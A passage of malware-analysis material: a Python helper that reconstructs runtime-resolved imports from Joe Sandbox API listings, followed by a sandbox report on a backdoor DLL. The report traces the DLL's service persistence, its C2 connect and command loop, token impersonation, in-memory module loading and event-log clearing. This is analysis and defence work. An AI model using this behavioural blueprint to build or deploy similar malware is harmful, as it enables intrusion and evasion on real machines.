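SAMPLE_APIS = """\
• LoadLibraryA.KERNEL32(kernel32.dll,?,?,?,1000383C,10004E5A,?,?,?,?,?,?), ref: 10003E85
• GetProcAddress.KERNEL32(00000000,CreateProcessA), ref: 10003E96
• GetProcAddress.KERNEL32(74DD0000,GetModuleFileNameA), ref: 10003EA3
• GetProcAddress.KERNEL32(74DD0000,CreateMutexA), ref: 10003EB0
• GetProcAddress.KERNEL32(74DD0000,ExpandEnvironmentStringsA), ref: 10003F80
• srand.MSVCRT ref: 003C1878
• GetModuleHandleA.KERNEL32(kernel32.dll), ref: 003C603C
• GetProcAddress.KERNEL32(00000000,003C6064), ref: 003C604F
"""

# One listing line: "<api>.<module>(<args>), ref: <hex address>"; the
# parenthesised argument list is absent for calls the engine logged without
# arguments (e.g. "srand.MSVCRT ref: ...").
API_LINE = re.compile(
    r"^\s*[•*-]?\s*(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>.*)\),)?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
HEX_WORD = re.compile(r"[0-9A-Fa-f]{8}")
# Assumption: these are the calls that establish which module later
# GetProcAddress calls resolve against.
LOADERS = {"LoadLibraryA", "LoadLibraryW", "GetModuleHandleA", "GetModuleHandleW"}


def parse_api_lines(text):
    """Parse listing lines into dicts with api, module, argument list and call site."""
    entries = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue  # headings, memory-dump lines, hashes: not API calls
        raw = m.group("args") or ""
        args = [a.strip() for a in raw.split(",")] if raw else []
        entries.append({
            "api": m.group("api"),
            "module": m.group("mod"),
            "args": args,
            "ref": int(m.group("ref"), 16),
        })
    return entries


def recover_dynamic_imports(entries):
    """Rebuild the runtime-resolved import list from the call sequence.

    The listing is in call order, so the most recent LoadLibrary*/GetModuleHandle*
    names the module that subsequent GetProcAddress calls resolve against. A
    GetProcAddress whose name argument is an 8-digit hex value is one the sandbox
    did not symbolize (an ordinal, or a pointer the engine did not dereference);
    those are returned separately so they are not silently dropped.
    """
    current = "<unknown>"
    imports = OrderedDict()
    unresolved = []
    for e in entries:
        if e["api"] in LOADERS and e["args"]:
            current = e["args"][0].lower()
        elif e["api"] == "GetProcAddress" and len(e["args"]) >= 2:
            name = e["args"][1]
            if HEX_WORD.fullmatch(name):
                unresolved.append((current, name, e["ref"]))
            else:
                imports.setdefault(current, []).append(name)
    return imports, unresolved


def report(text):
    """Human-readable summary, one line per module plus one per unsymbolized target."""
    imports, unresolved = recover_dynamic_imports(parse_api_lines(text))
    lines = []
    for mod, names in imports.items():
        lines.append(f"{mod}: {len(names)} names resolved at runtime")
        lines.extend(f"    {n}" for n in names)
    for mod, name, ref in unresolved:
        lines.append(f"{mod}: unsymbolized GetProcAddress target {name} at {ref:08X}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(SAMPLE_APIS))
```

Feed it the full "APIs" block of a function (the kernel32 run under Control-flow Graph yields over twenty names from a single LoadLibraryA) and the output is effectively the import table the packer hid; the unsymbolized entries are the ones worth opening in the dump, since a hex target next to a GetModuleHandleA(kernel32.dll) is typically a name string or hash the engine did not follow.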

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:10%
                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                Signature Coverage:10.7%
                                                                                                                Total number of Nodes:642
                                                                                                                Total number of Limit Nodes:4
execution_graph: node/edge dump of the rendered graph (the drawing itself is not recoverable as text). Function entry points and API sequences that survive in the dump, grouped by the behaviour they implement:
• Service persistence: 10001e37 → 10001b5b OpenSCManagerA, CreateServiceA, ChangeServiceConfig2A ×2, wsprintfA, StartServiceA (on GetLastError falls back to OpenServiceA, StartServiceA); 10001acf OpenSCManagerA, OpenServiceA, QueryServiceStatus, ControlService, Sleep; 10001f48 OpenServiceA, DeleteService, CloseServiceHandle; 10002f7b wsprintfA, CreateProcessA, GetModuleFileNameA, GetFileAttributesA, GetLastError, Sleep, then 10001a43 OpenSCManagerA, OpenServiceA, StartServiceA, QueryServiceStatus; 1000304f wsprintfA, GetLocalTime.
• Service entry and control handler: 1000336e strncpy, wcstombs, RegisterServiceCtrlHandlerA, FreeConsole, SetServiceStatus (1000318a), GetVersionExA, MainThread (1000340f), GetModuleFileNameA, wsprintfA, Sleep, GetExitCodeProcess, CloseHandle, WaitForSingleObject; 10001fbd SetTokenInformation, CreateProcessAsUserA, CloseHandle ×2; 100032f7 SetServiceStatus, Sleep.
• Mutex check and C2 connect loop: 10002d9e __EH_prolog, wsprintfA, CreateMutexA, GetLastError, ReleaseMutex, CloseHandle; 100012d4 _CxxThrowException, WSAStartup, CreateEventA, memcpy; 10002e28 rand, Sleep; 10002e3d lstrcatA, strcmp; GetTickCount; 10001445 ResetEvent, socket, gethostbyname, htons, connect, setsockopt, WSAIoctl, then 100042ee CreateEventA, _beginthreadex, WaitForSingleObject, CloseHandle; 10002144 → 10003842 CreateEventA, lstrcpyA; 10002f0a WaitForSingleObject, Sleep. Teardown 1000180a setsockopt, CancelIo, InterlockedExchange, closesocket, SetEvent; 1000219e TerminateThread, CloseHandle; 100013b6 WaitForSingleObject, CloseHandle ×2, WSACleanup, VirtualFree.
• Host profile built and sent: 100036ba memset, wsprintfA, lstrlenA; 10004822 (strchr, wsprintfA, lstrcpyA, FreeLibrary); 1000372e memset, getsockname, memcpy; 100035ea lstrlenA, gethostname, GetVersionExA; 1000358c GetSystemInfo, wsprintfA; 100037a4 GlobalMemoryStatusEx; 100031d2 then 1000366a LoadLibraryA, GetProcAddress ×2, FreeLibrary; 10003629 lstrlenA, lstrcpyA; buffer handling in 10001863 via 100012a4 VirtualFree, ??2@YAPAXI, memcpy and 1000104c / 10001155 ceil, _ftol, VirtualAlloc, memcpy, VirtualFree; transmission in 1000199f send, Sleep.
• Receive loop: 1000152b select, memset, recv; 10001603 __EH_prolog, memcmp, memcpy, _CxxThrowException, ??3@YAXPAX, 100010cf ??2@YAPAXI ×2, memcpy, 100011fb ceil, _ftol, VirtualAlloc, memcpy, VirtualFree; results passed back through 10001863.
• Command dispatcher 100021ff (branching at 1000221f): VirtualAlloc, memcpy, thread start via 100042ee; 10002bc3 strlen, memset, lstrlenA, strstr, lstrcpyA, CreateProcessA; 10002583 → 10003cd2 _stricmp; 10002b96 → 1000473f LoadLibraryA, GetProcAddress ×3, lstrcmpiA, CloseHandle, FreeLibrary; 100026df wsprintfA, strlen; 100025a2 → 10004666 (LoadLibraryA, GetProcAddress, CloseHandle, FreeLibrary) then ExitWindowsEx; 1000260e LocalAlloc, memcpy, LocalSize, Sleep, LocalFree; 10002264 Sleep; 1000273d GetModuleFileNameA, wsprintfA, WinExec; 1000265e OpenEventLogA, ClearEventLogA, CloseEventLog; 10002b58 EnumWindows → 10002ac4 IsWindowVisible, SendMessageA, lstrlenA, _strupr ×2, strstr; 100029b6 memcpy, CreateFileA, WriteFile, CloseHandle, strlen, wsprintfA or lstrcpyA → 100027bc memset, strrchr ×2, strcpy or strlen/strncpy, wsprintfA, ExpandEnvironmentStringsA, strstr ×2, lstrcatA ×2 or lstrcpyA, CreateProcessA.
• Drop-and-run helpers: 10002c96 strlen, ??2@YAPAXI, memcpy, strrchr; 10004529 LoadLibraryA, GetProcAddress ×2, 100045a9 CreateFileA, memset, GetProcAddress, WriteFile, CloseHandle, Sleep, FreeLibrary; 1000248b GetFileAttributesA, GetLastError; 10002ced CreateProcessA. 10002d35 strrchr → 10004529 → 1000248b → 1000273d GetModuleFileNameA, wsprintfA, WinExec.
• In-memory module loader: 1000389c VirtualAlloc ×2, GetProcessHeap, HeapAlloc, VirtualAlloc ×2, memcpy; 100039ba VirtualAlloc with memset or memcpy per region; 10003b9e LoadLibraryA, GetProcAddress, realloc, FreeLibrary; 10003a67 VirtualProtect, VirtualFree; 10003cd2 _stricmp; teardown 10003d5d FreeLibrary, free, VirtualFree, GetProcessHeap, HeapFree. Callers 100024ac (printf, memset, memcpy, ??2@YAPAXI) and 100023fa (printf, OutputDebugStringA, VirtualFree) wrap it.
• Other: 1000428a memcpy, SetEvent, then 10004467 LoadLibraryA, GetProcAddress ×3, FreeLibrary ×3; 100025ca memcpy, MessageBoxA; 10003e12 FreeLibrary ×6; 10004d20 _onexit, __dllonexit; 10004d5f malloc, _initterm, free; 10004c46 ??1type_info@@UAE; 10001030 VirtualFree; 10003e6b → 10003e78 "71 API calls" (the kernel32 resolver whose calls are listed under Control-flow Graph below).

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,?,?,1000383C,10004E5A,?,?,?,?,?,?), ref: 10003E85
                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateProcessA), ref: 10003E96
                                                                                                                • GetProcAddress.KERNEL32(74DD0000,GetModuleFileNameA), ref: 10003EA3
                                                                                                                • GetProcAddress.KERNEL32(74DD0000,CreateMutexA), ref: 10003EB0
                                                                                                                • GetProcAddress.KERNEL32(74DD0000,ReleaseMutex), ref: 10003EBD
                                                                                                                • GetProcAddress.KERNEL32(74DD0000,GetLastError), ref: 10003ECA
                                                                                                                • GetProcAddress.KERNEL32(74DD0000,CloseHandle), ref: 10003ED7
                                                                                                                • GetProcAddress.KERNEL32(74DD0000,Sleep), ref: 10003EE4
                                                                                                                • GetProcAddress.KERNEL32(74DD0000,lstrcatA), ref: 10003EF1
                                                                                                                • GetProcAddress.KERNEL32(74DD0000,GetTickCount), ref: 10003EFE
                                                                                                                • GetProcAddress.KERNEL32(74DD0000,WaitForSingleObject), ref: 10003F0B
                                                                                                                • GetProcAddress.KERNEL32(74DD0000,GetFileAttributesA), ref: 10003F18
                                                                                                                • GetProcAddress.KERNEL32(74DD0000,CreateEventA), ref: 10003F25
                                                                                                                • GetProcAddress.KERNEL32(74DD0000,ResetEvent), ref: 10003F32
                                                                                                                • GetProcAddress.KERNEL32(74DD0000,CancelIo), ref: 10003F3F
                                                                                                                • GetProcAddress.KERNEL32(74DD0000,SetEvent), ref: 10003F4C
                                                                                                                • GetProcAddress.KERNEL32(74DD0000,TerminateThread), ref: 10003F59
                                                                                                                • GetProcAddress.KERNEL32(74DD0000,GetVersionExA), ref: 10003F66
                                                                                                                • GetProcAddress.KERNEL32(74DD0000,GetExitCodeProcess), ref: 10003F73
                                                                                                                • GetProcAddress.KERNEL32(74DD0000,ExpandEnvironmentStringsA), ref: 10003F80
                                                                                                                • GetProcAddress.KERNEL32(74DD0000,GetSystemInfo), ref: 10003F8D
                                                                                                                • GetProcAddress.KERNEL32(74DD0000,GetSystemDirectoryA), ref: 10003F9A
                                                                                                                • GetProcAddress.KERNEL32(74DD0000,MoveFileA), ref: 10003FA7
                                                                                                                • GetProcAddress.KERNEL32(74DD0000,MoveFileExA), ref: 10003FB4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$LibraryLoad
                                                                                                                • String ID: ADVAPI32.dll$CancelIo$ChangeServiceConfig2A$CloseHandle$CloseServiceHandle$ControlService$CreateEventA$CreateMutexA$CreateProcessA$CreateProcessAsUserA$CreateServiceA$DeleteService$DuplicateTokenEx$EnumWindows$ExitWindowsEx$ExpandEnvironmentStringsA$GetCurrentProcess$GetExitCodeProcess$GetFileAttributesA$GetLastError$GetModuleFileNameA$GetSystemDirectoryA$GetSystemInfo$GetTickCount$GetVersionExA$IsWindowVisible$MSVCRT.dll$MessageBoxA$MoveFileA$MoveFileExA$OpenProcessToken$OpenSCManagerA$OpenServiceA$QueryServiceStatus$RegisterServiceCtrlHandlerA$ReleaseMutex$ResetEvent$SendMessageA$SetEvent$SetServiceStatus$SetTokenInformation$Sleep$StartServiceA$TerminateThread$User32.dll$WSACleanup$WSAIoctl$WSAStartup$WTSGetActiveConsoleSessionId$WaitForSingleObject$closesocket$connect$gethostbyname$gethostname$getsockname$htons$kernel32.dll$lstrcatA$memcpy$memset$recv$select$send$setsockopt$socket$strcmp$strlen$strstr$wininet.dll$ws2_32.dll$wsprintfA
                                                                                                                • API String ID: 2238633743-2593546367
                                                                                                                • Opcode ID: c0ece4e7efd5b4c6edabd0fb5669f7d958223cf09bcca4ca1208277cbc57487f
                                                                                                                • Instruction ID: 1d4e4a84f7054c9bea1b663399dca5a43fab5260fb22e9cb011038ddc9d5f956
                                                                                                                • Opcode Fuzzy Hash: c0ece4e7efd5b4c6edabd0fb5669f7d958223cf09bcca4ca1208277cbc57487f
                                                                                                                • Instruction Fuzzy Hash: F5B16970800B45AEE731AF32CD04EA7BEF6FF84340B118D2DE5AA56924DB32A855DF51

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNELBASE(userenv.dll,00000000,00000104,00000000), ref: 10001FCB
                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 10001FDA
                                                                                                                • memset.MSVCRT ref: 10001FF9
                                                                                                                • memset.MSVCRT ref: 10002005
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 10002023
                                                                                                                • OpenProcessToken.ADVAPI32(00000000,000F01FF,10003544), ref: 10002033
                                                                                                                • DuplicateTokenEx.ADVAPI32(10003544,02000000,00000000,00000001,00000001,?), ref: 1000204A
                                                                                                                • SetTokenInformation.ADVAPI32(?,0000000C,?,00000004), ref: 10002069
                                                                                                                • CreateProcessAsUserA.KERNELBASE(?,00000000,10003544,00000000,00000000,00000000,00000430,?,00000000,?,?), ref: 10002094
                                                                                                                • CloseHandle.KERNEL32(?), ref: 100020A0
                                                                                                                • CloseHandle.KERNEL32(10003544), ref: 100020A9
                                                                                                                • FreeLibrary.KERNELBASE(?), ref: 100020BB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ProcessToken$CloseHandleLibrarymemset$AddressCreateCurrentDuplicateFreeInformationLoadOpenProcUser
                                                                                                                • String ID: CreateEnvironmentBlock$WinSta0\Default$userenv.dll
                                                                                                                • API String ID: 389336417-1779146383
                                                                                                                • Opcode ID: b17ba00ba64db28f18bd6f450c5a4aff0af55f28d04f5de357443b33628a04c7
                                                                                                                • Instruction ID: 393253a686a726e0e40b90c7e54b6c9b8ea898aa750e1207ba5c491074f34e4f
                                                                                                                • Opcode Fuzzy Hash: b17ba00ba64db28f18bd6f450c5a4aff0af55f28d04f5de357443b33628a04c7
                                                                                                                • Instruction Fuzzy Hash: E13104B2D11229BBEB11DFD5CD89DDEBFBAEF08781F200056F605A2154C7B15A00DBA0

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • strncpy.MSVCRT ref: 1000338C
                                                                                                                • wcstombs.MSVCRT ref: 1000339C
                                                                                                                • RegisterServiceCtrlHandlerA.ADVAPI32(?,100032F7), ref: 100033B1
                                                                                                                • FreeConsole.KERNEL32 ref: 100033C6
                                                                                                                  • Part of subcall function 1000318A: SetServiceStatus.SECHOST(00000010), ref: 100031CA
                                                                                                                • GetVersionExA.KERNEL32(?), ref: 100033F3
                                                                                                                • MainThread.6011859 ref: 1000340F
                                                                                                                  • Part of subcall function 1000315D: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 10003178
                                                                                                                  • Part of subcall function 1000315D: CloseHandle.KERNEL32(00000000), ref: 1000317F
                                                                                                                • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 10003426
                                                                                                                • lstrcatA.KERNEL32(?,1000660C), ref: 10003438
                                                                                                                • lstrcatA.KERNEL32(?,SySyeu), ref: 1000344A
                                                                                                                • lstrcatA.KERNEL32(?,.exe), ref: 1000345C
                                                                                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1000346A
                                                                                                                • lstrcatA.KERNEL32(?,\Rundll32.exe), ref: 1000347C
                                                                                                                • CopyFileA.KERNEL32(?,?,00000001), ref: 10003492
                                                                                                                • GetFileAttributesA.KERNELBASE(?), ref: 1000349F
                                                                                                                • GetLastError.KERNEL32 ref: 100034AA
                                                                                                                • wsprintfA.USER32 ref: 100034C3
                                                                                                                • GetModuleFileNameA.KERNEL32(?,00000104), ref: 100034DE
                                                                                                                • wsprintfA.USER32 ref: 100034FE
                                                                                                                • Sleep.KERNELBASE(000003E8), ref: 1000350C
                                                                                                                • GetExitCodeProcess.KERNELBASE(00000000,?), ref: 10003517
                                                                                                                • CloseHandle.KERNELBASE(00000000), ref: 10003527
                                                                                                                • Sleep.KERNELBASE(00000BB8), ref: 10003532
                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 10003559
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 10003560
                                                                                                                • Sleep.KERNEL32(00000064), ref: 10003568
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrcat$CloseFileHandleSleep$DirectoryObjectServiceSingleWaitwsprintf$AttributesCodeConsoleCopyCtrlCurrentErrorExitFreeHandlerLastMainModuleNameProcessRegisterStatusSystemThreadVersionstrncpywcstombs
                                                                                                                • String ID: %s "%s",MainThread$.exe$SySyeu$\Rundll32.exe
                                                                                                                • API String ID: 2268562214-1198991748
                                                                                                                • Opcode ID: edc6bb86fa15e14382b8bf422a5a5e13054f2286661d091575d839084948f042
                                                                                                                • Instruction ID: 41d25408302aabc459f6968b7f59f59ff79b25a4c4978eb5c8748b31ff7b5c46
                                                                                                                • Opcode Fuzzy Hash: edc6bb86fa15e14382b8bf422a5a5e13054f2286661d091575d839084948f042
                                                                                                                • Instruction Fuzzy Hash: 06515275800269AFEB11DBA0CCC99DF77BEEB09395F604465F209D2058DB719A84CF61

                                                                                                                Control-flow Graph

                                                                                                                control_flow_graph 34 1000318a-100031d1 SetServiceStatus
                                                                                                                APIs
                                                                                                                • SetServiceStatus.SECHOST(00000010), ref: 100031CA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ServiceStatus
                                                                                                                • String ID:
                                                                                                                • API String ID: 3969395364-0
                                                                                                                • Opcode ID: 27465d0ccf9c2ca7f2eb77ed8655f8ffd3fcd3240fb6f93fded1e015b92d134b
                                                                                                                • Instruction ID: 42df913d68a79b1f62ab0f840a1365e4bfcb694bfd220718bb7b564d1378dfbb
                                                                                                                • Opcode Fuzzy Hash: 27465d0ccf9c2ca7f2eb77ed8655f8ffd3fcd3240fb6f93fded1e015b92d134b
                                                                                                                • Instruction Fuzzy Hash: 24F0A5B0D0021EDFDB40DF99D8857AEBBF4BB08348F108069E818A7244D7B496048F90

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,?,00000000), ref: 10001B96
                                                                                                                • _local_unwind2.MSVCRT ref: 10001BA9
                                                                                                                • CreateServiceA.ADVAPI32(00000000,00000000,00000000,000F01FF,?,10001E9B,00000000,?,00000000,00000000,?,00000000,00000000,?,00000000), ref: 10001BE6
                                                                                                                • GetLastError.KERNEL32(?,00000000), ref: 10001BF5
                                                                                                                • OpenServiceA.ADVAPI32(10001E9B,00000000,000F01FF,?,00000000), ref: 10001C09
                                                                                                                • StartServiceA.ADVAPI32(00000000,00000000,00000000,?,00000000), ref: 10001C1F
                                                                                                                • ChangeServiceConfig2A.ADVAPI32(00000000,00000001,?,?,00000000), ref: 10001C43
                                                                                                                • ChangeServiceConfig2A.ADVAPI32(00000000,00000002,?), ref: 10001CA3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Service$ChangeConfig2Open$CreateErrorLastManagerStart_local_unwind2
                                                                                                                • String ID: Description$SYSTEM\CurrentControlSet\Services\%s
                                                                                                                • API String ID: 1109860625-2908613140
                                                                                                                • Opcode ID: ae27365f3abc695d381728d134456e741ffe8850672492339ff11c7de2e79d22
                                                                                                                • Instruction ID: 34160cdb049149ef51204cb724d21122ba78e6005a4a2cbc3d1f025aef1d8869
                                                                                                                • Opcode Fuzzy Hash: ae27365f3abc695d381728d134456e741ffe8850672492339ff11c7de2e79d22
                                                                                                                • Instruction Fuzzy Hash: E6813270C086A8DEEB21CB64CC88BDEBFB5AB19344F0401D9E55C66291C77A0F94CF65
                                                                                                                APIs
                                                                                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,SySyeu,?,?,?,?,?,?,?,10003043,SySyeu), ref: 10001A54
                                                                                                                • OpenServiceA.ADVAPI32(00000000,?,000F01FF,?,?,?,?,?,?,?,10003043,SySyeu), ref: 10001A69
                                                                                                                • StartServiceA.ADVAPI32(00000000,00000000,00000000,?,?,?,?,?,?,?,10003043,SySyeu), ref: 10001A7A
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,10003043,SySyeu), ref: 10001A84
                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,10003043,SySyeu), ref: 10001A92
                                                                                                                • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,?,?,10003043,SySyeu), ref: 10001AA0
                                                                                                                • Sleep.KERNEL32(00000064), ref: 10001AB2
                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,10003043,SySyeu), ref: 10001ABB
                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,10003043,SySyeu), ref: 10001AC2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Service$CloseHandle$Open$ErrorLastManagerQuerySleepStartStatus
                                                                                                                • String ID: SySyeu
                                                                                                                • API String ID: 191932718-1969729670
                                                                                                                • Opcode ID: 014086cccfa01bbc5a08c9c9583791d5995df2f921ac7ee13cb4fdb749c4e3c5
                                                                                                                • Instruction ID: 9ee7ec8bb55b1ac22ac6ce330aaae550d3e81ab1b6a3f2d0b0f6497ceb73b83b
                                                                                                                • Opcode Fuzzy Hash: 014086cccfa01bbc5a08c9c9583791d5995df2f921ac7ee13cb4fdb749c4e3c5
                                                                                                                • Instruction Fuzzy Hash: 33012531746327EBF711ABA05CC9FEF36A9EB0A7C1F200420F602D9099DB65884186E6
                                                                                                                APIs
                                                                                                                • strlen.MSVCRT ref: 10002BD1
                                                                                                                • memset.MSVCRT ref: 10002BEF
                                                                                                                  • Part of subcall function 10004822: memset.MSVCRT ref: 10004857
                                                                                                                  • Part of subcall function 10004822: memset.MSVCRT ref: 1000486A
                                                                                                                  • Part of subcall function 10004822: memset.MSVCRT ref: 10004878
                                                                                                                  • Part of subcall function 10004822: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,00002081,00000144,00000000), ref: 10004885
                                                                                                                  • Part of subcall function 10004822: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 1000489D
                                                                                                                  • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 100048AD
                                                                                                                  • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 100048BD
                                                                                                                  • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 100048CA
                                                                                                                  • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 100048D7
                                                                                                                  • Part of subcall function 10004822: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00002081,00000144,00000000), ref: 10004A63
                                                                                                                • lstrlenA.KERNEL32(?), ref: 10002C1E
                                                                                                                • strstr.MSVCRT ref: 10002C34
                                                                                                                • lstrcpyA.KERNEL32(00000000,?), ref: 10002C44
                                                                                                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 10002C8A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$memset$Library$CreateFreeLoadProcesslstrcpylstrlenstrlenstrstr
                                                                                                                • String ID: Applications\iexplore.exe\shell\open\command$D$WinSta0\Default
                                                                                                                • API String ID: 2952214944-490771695
                                                                                                                • Opcode ID: 7fd2577a0a9b6326ac895a1fa05e515703ef0ef4a7097cdaa6f8a03547f7ada4
                                                                                                                • Instruction ID: 41262b3153465784fb7137690828f40fbae5b7cfa485d5802afb8d228550aeb8
                                                                                                                • Opcode Fuzzy Hash: 7fd2577a0a9b6326ac895a1fa05e515703ef0ef4a7097cdaa6f8a03547f7ada4
                                                                                                                • Instruction Fuzzy Hash: 46216A72900128AAFF60CBE1CD48EDF7BBCEF453D2F100015BA09E6048DA719A84CBA0
                                                                                                                APIs
                                                                                                                • OpenEventLogA.ADVAPI32(00000000,Application), ref: 100026B8
                                                                                                                • ClearEventLogA.ADVAPI32(00000000,00000000), ref: 100026C7
                                                                                                                • CloseEventLog.ADVAPI32(00000000), ref: 100026CE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
